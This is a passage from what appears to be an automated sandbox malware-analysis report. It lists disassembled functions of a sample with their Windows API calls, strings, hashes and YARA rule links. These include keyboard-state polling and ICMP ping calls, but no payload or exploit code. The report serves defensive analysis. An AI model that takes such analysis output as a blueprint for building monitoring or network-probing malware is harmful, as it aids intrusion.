                                                                                                                • Opcode ID: a597c0a6c8776ac2b93bbe8f85cbce59a6f55ce07c5c3dbe6a77d5bd22255bca
                                                                                                                • Instruction ID: 7ce977354aeb2513e23424d07e1f7571de764320cbe7ebcf0cb2f36e17337fb6
                                                                                                                • Opcode Fuzzy Hash: a597c0a6c8776ac2b93bbe8f85cbce59a6f55ce07c5c3dbe6a77d5bd22255bca
                                                                                                                • Instruction Fuzzy Hash: 2441A335110141ABDF325F28E88DBFA37B6AB1A730F154365FD698A1E1D7308C91DB22
                                                                                                                Function 00247334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 136442275-0
                                                                                                                • Opcode ID: 1a0db463db38c7345d51abaaf3d2665ccc2fbd5a24ae5a5451bad160a5c22f04
                                                                                                                • Instruction ID: 1a2068f91997f7e5b99361edf371b9b2be8af1be9e1ee2bf644b7f7373d27e91
                                                                                                                • Opcode Fuzzy Hash: 1a0db463db38c7345d51abaaf3d2665ccc2fbd5a24ae5a5451bad160a5c22f04
                                                                                                                • Instruction Fuzzy Hash: 3E4110B291412CAADF25EB90DC51EEE73BCAB18310F1041E6F519A2051EB75AFE4CF64
                                                                                                                Function 002084A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __swprintf.LIBCMT ref: 002084E5
                                                                                                                • __itow.LIBCMT ref: 00208519
                                                                                                                  • Part of subcall function 00222177: _xtow@16.LIBCMT ref: 00222198
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                • API String ID: 1502193981-2263619337
                                                                                                                • Opcode ID: 502dd53fd2cc7274196d03278a18d919d7d16bc13bc69bf49690f70be019a90e
                                                                                                                • Instruction ID: 717b4f8df564bc45b8c611b5a309854ac26d446d3e95b4a93f8d7b02f988ed5a
                                                                                                                • Opcode Fuzzy Hash: 502dd53fd2cc7274196d03278a18d919d7d16bc13bc69bf49690f70be019a90e
                                                                                                                • Instruction Fuzzy Hash: 07412771530716ABDB24DF74D841E6AB7E5BF04300F20445EE58DD61C2EA719A61CF10
                                                                                                                Function 00225C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00225CCA
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • __gmtime64_s.LIBCMT ref: 00225D63
                                                                                                                • __gmtime64_s.LIBCMT ref: 00225D99
                                                                                                                • __gmtime64_s.LIBCMT ref: 00225DB6
                                                                                                                • __allrem.LIBCMT ref: 00225E0C
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225E28
                                                                                                                • __allrem.LIBCMT ref: 00225E3F
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225E5D
                                                                                                                • __allrem.LIBCMT ref: 00225E74
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225E92
                                                                                                                • __invoke_watson.LIBCMT ref: 00225F03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 384356119-0
                                                                                                                • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                • Instruction ID: a9bb9b7d8bed0aa1415b4f99cb36cac352d8272f75d6cef2babbbd20a2b22b5e
                                                                                                                • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                • Instruction Fuzzy Hash: E471ECB1A11F37BBD714DEB8DC41B6AB3A4BF14724F14812AF414D7681E774DA608B90
                                                                                                                Function 002457FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00245816
                                                                                                                • GetMenuItemInfoW.USER32(002C18F0,000000FF,00000000,00000030), ref: 00245877
                                                                                                                • SetMenuItemInfoW.USER32(002C18F0,00000004,00000000,00000030), ref: 002458AD
                                                                                                                • Sleep.KERNEL32(000001F4), ref: 002458BF
                                                                                                                • GetMenuItemCount.USER32(?), ref: 00245903
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0024591F
                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00245949
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 0024598E
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002459D4
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002459E8
                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00245A09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4176008265-0
                                                                                                                • Opcode ID: 7c6b05e45a3edadaa622fe4616b04f04dad9297fa6f4cb19062be8ee9f92e7a2
                                                                                                                • Instruction ID: 29cfe866e29f860b6a889d3804f4b90d6f0642b0876de51d20491a15429c6776
                                                                                                                • Opcode Fuzzy Hash: 7c6b05e45a3edadaa622fe4616b04f04dad9297fa6f4cb19062be8ee9f92e7a2
                                                                                                                • Instruction Fuzzy Hash: D461E374920A6AEFDF19CFA4D888EAE7BB8EF05314F140119F481A7252D770AD65CB60
                                                                                                                Function 00269A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00269AA5
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00269AA8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00269ACC
                                                                                                                • _memset.LIBCMT ref: 00269ADD
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00269AEF
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00269B67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 830647256-0
                                                                                                                • Opcode ID: 3cff05c1b43c68b3653b1d3cad34fa7aba94722f40200e43e43d4c989c030668
                                                                                                                • Instruction ID: 2300fddbabb0283fe5e2576926d51d882da99d220c890faec8bccfaf4677af61
                                                                                                                • Opcode Fuzzy Hash: 3cff05c1b43c68b3653b1d3cad34fa7aba94722f40200e43e43d4c989c030668
                                                                                                                • Instruction Fuzzy Hash: 05616D75A10208AFEB11DFA4DC85EEE77F8AF09704F10015AFA14E7292DB70ADA5DB50
                                                                                                                Function 00243569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00243591
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00243612
                                                                                                                • GetKeyState.USER32(000000A0), ref: 0024362D
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00243647
                                                                                                                • GetKeyState.USER32(000000A1), ref: 0024365C
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00243674
                                                                                                                • GetKeyState.USER32(00000011), ref: 00243686
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0024369E
                                                                                                                • GetKeyState.USER32(00000012), ref: 002436B0
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 002436C8
                                                                                                                • GetKeyState.USER32(0000005B), ref: 002436DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 585a9c707c3adb58333f9359c9275badcafc5d4aac7091344cf5a109e9249da5
                                                                                                                • Instruction ID: 06c25f17d56d17f8517864c4f0b488607c54582353d3b97e9998910368104a24
                                                                                                                • Opcode Fuzzy Hash: 585a9c707c3adb58333f9359c9275badcafc5d4aac7091344cf5a109e9249da5
                                                                                                                • Instruction Fuzzy Hash: 694116745147CB3DFF38CF6488183A5BEE46F11344F44805AD5C2862C2EBA49BE8CB6A
                                                                                                                Function 0023A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0023A2AA
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 0023A2F5
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0023A307
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0023A327
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0023A36A
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0023A37E
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0023A393
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 0023A3A0
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023A3A9
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0023A3BB
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023A3C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                • Opcode ID: d829d94a4fc9e913cc9b6b03a995df75d4d05bc36ecf0419a0926c26397979bb
                                                                                                                • Instruction ID: 6eb649739d1d108eebf9981b38475b23a444d5d135b5404f5cb49ab74e258730
                                                                                                                • Opcode Fuzzy Hash: d829d94a4fc9e913cc9b6b03a995df75d4d05bc36ecf0419a0926c26397979bb
                                                                                                                • Instruction Fuzzy Hash: 13415E75911219EFDB00EFA4DC889DEBBB9FF08314F008065F541A32A1DB30AA59CFA1
                                                                                                                Function 0025B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • CoInitialize.OLE32 ref: 0025B298
                                                                                                                • CoUninitialize.OLE32 ref: 0025B2A3
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0028D8FC,?), ref: 0025B303
                                                                                                                • IIDFromString.OLE32(?,?), ref: 0025B376
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0025B410
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0025B471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                • Opcode ID: 929cfe976aced1e80d8c45abadf521275329ac7b55531c5e1d1964a4a404a2da
                                                                                                                • Instruction ID: 4a7ea8c4434c819a3273e3062c40ed8d4fcc470f801748507dafaf73ff0129a2
                                                                                                                • Opcode Fuzzy Hash: 929cfe976aced1e80d8c45abadf521275329ac7b55531c5e1d1964a4a404a2da
                                                                                                                • Instruction Fuzzy Hash: F561C030224301AFD712DF54C889F6EB7E8AF88715F04085DF985AB292D770ED69CB96
                                                                                                                Function 00258694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 002586F5
                                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 0025873A
                                                                                                                • gethostbyname.WSOCK32(?), ref: 00258746
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00258754
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002587C4
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002587DA
                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0025884F
                                                                                                                • WSACleanup.WSOCK32 ref: 00258855
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: fc756f3f117749c6eb9c63b4deb84d610b0e21f939b172659bb41f5494622307
                                                                                                                • Instruction ID: d523825c2848ae053ccdc3d9c6881cf03fbdaf4e78aceaed8e3577c76097eb17
                                                                                                                • Opcode Fuzzy Hash: fc756f3f117749c6eb9c63b4deb84d610b0e21f939b172659bb41f5494622307
                                                                                                                • Instruction Fuzzy Hash: EC5182356243019FD710EF20DC89B6AB7E4EF48725F144929F956AB2E1DBB0E828CF45
                                                                                                                Function 00269C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00269C68
                                                                                                                • CreateMenu.USER32 ref: 00269C83
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00269C92
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00269D1F
                                                                                                                • IsMenu.USER32(?), ref: 00269D35
                                                                                                                • CreatePopupMenu.USER32 ref: 00269D3F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00269D70
                                                                                                                • DrawMenuBar.USER32 ref: 00269D7E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 176399719-4108050209
                                                                                                                • Opcode ID: 851c7df1465febef1abadba273dce0143b980bb6f64f1f3e0cb5287230fba4e5
                                                                                                                • Instruction ID: 9357d5dbca3cda5ee37ec708d2f69e3c6f2b18bfe5e378d97afae2d5ac4931ae
                                                                                                                • Opcode Fuzzy Hash: 851c7df1465febef1abadba273dce0143b980bb6f64f1f3e0cb5287230fba4e5
                                                                                                                • Instruction Fuzzy Hash: 2C416D7961120AEFDB10EF64E948FEA7BB9FF49314F140029E94597391DB30A9A4CF50
                                                                                                                Function 0024EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0024EC1E
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0024EC94
                                                                                                                • GetLastError.KERNEL32 ref: 0024EC9E
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0024ED0B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: a2bdbdb346ca089498539e57504295a64084cae4211f37d022735a51409e4cfe
                                                                                                                • Instruction ID: d88cfdf3b7b106691ab486351186cc5c1458f214272ed5d7bc47f79efbdfbb42
                                                                                                                • Opcode Fuzzy Hash: a2bdbdb346ca089498539e57504295a64084cae4211f37d022735a51409e4cfe
                                                                                                                • Instruction Fuzzy Hash: 9131B235A20306AFEB04EF64C989EAEB7B4FF44710F114016E506D72D2DB719961CB91
                                                                                                                Function 0023C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0023C782
                                                                                                                • GetDlgCtrlID.USER32 ref: 0023C78D
                                                                                                                • GetParent.USER32 ref: 0023C7A9
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0023C7AC
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0023C7B5
                                                                                                                • GetParent.USER32(?), ref: 0023C7D1
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0023C7D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 313823418-1403004172
                                                                                                                • Opcode ID: 3dcbba04314db380024a138a1c52e6351e56a59c07172faf6d1b1ba5d61fd554
                                                                                                                • Instruction ID: d8faa6880bfbdf2ef3658b2fc22c79b08cd346a6bdd2ee19c558359e96996a7a
                                                                                                                • Opcode Fuzzy Hash: 3dcbba04314db380024a138a1c52e6351e56a59c07172faf6d1b1ba5d61fd554
                                                                                                                • Instruction Fuzzy Hash: AA2192B8A10218ABDF05EB64DC85DBEB769EB45310F204115F951A71D2DB7458299F20
                                                                                                                Function 0023C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0023C869
                                                                                                                • GetDlgCtrlID.USER32 ref: 0023C874
                                                                                                                • GetParent.USER32 ref: 0023C890
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0023C893
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0023C89C
                                                                                                                • GetParent.USER32(?), ref: 0023C8B8
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0023C8BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
